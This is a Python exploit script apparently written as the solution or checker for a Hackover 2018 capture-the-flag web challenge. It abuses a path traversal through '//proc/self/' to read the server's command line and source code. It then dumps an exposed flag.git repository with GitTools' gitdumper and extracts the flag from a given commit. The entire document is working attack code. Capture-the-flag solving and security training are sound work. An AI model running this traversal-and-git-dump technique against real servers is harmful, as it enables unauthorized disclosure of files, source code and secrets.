#!/usr/bin/env python3
from sys import argv
from sys import exit
from argparse import ArgumentParser
from requests import get
from os import path
from os import chdir
from os.path import basename
from subprocess import check_output
from re import search

basedir = path.abspath(path.dirname(__file__))
parser = ArgumentParser(prog=argv[0])
parser.add_argument('--host', action='store', default='localhost', help='target host')
parser.add_argument('--port', type=int, default=1337, help='target port')
args = parser.parse_args()

HOST = f'http://{args.host}:{args.port}'

print("[+] getting /proc/self/cmdline...")
r = get(f'{HOST}//proc/self/cmdline', data={})
assert(r.status_code == 200)
cmdline = r.text.split('\x00')
print(f'[+] cmdline: {" ".join(cmdline)}')

filename = basename(cmdline[1])
print(f'[+] filename: {filename}')

print("[+] getting source...")
r = get(f'{HOST}//proc/self/cwd/{filename}', data={})
assert(r.status_code == 200)
assert('flag.git' in r.text)

url = f'{HOST}//proc/self/cwd//flag.git/refs/heads/master'
print(f'[+] Getting refs/heads/master...')
r = get(url, data={})
master_head = r.text[:-1]
assert(r.status_code == 200)
print("[+] HEAD: {}".format(master_head))

print('[+] Initialize gittools...')
chdir(basedir)
check_output(['rm', '-rf', 'flag.git'])
check_output(['./GitTools/Dumper/gitdumper.sh', f'{args.host}', f'{args.port}', '//proc/self/cwd//flag.git/', 'flag.git'])

print('[*] fetching flag...')
git = check_output(['git', '-C', 'flag.git', 'show', '38db5649511b84ec8f9eb6492dbe43eabe1e6a4a']).decode()
assert('hackover18{' in git)

flag = search('hackover18{.+}', git)[0]
print(f'[+] flag: {flag}')
if flag.startswith("hackover18{"):
    exit(0)
else:
    exit(1)
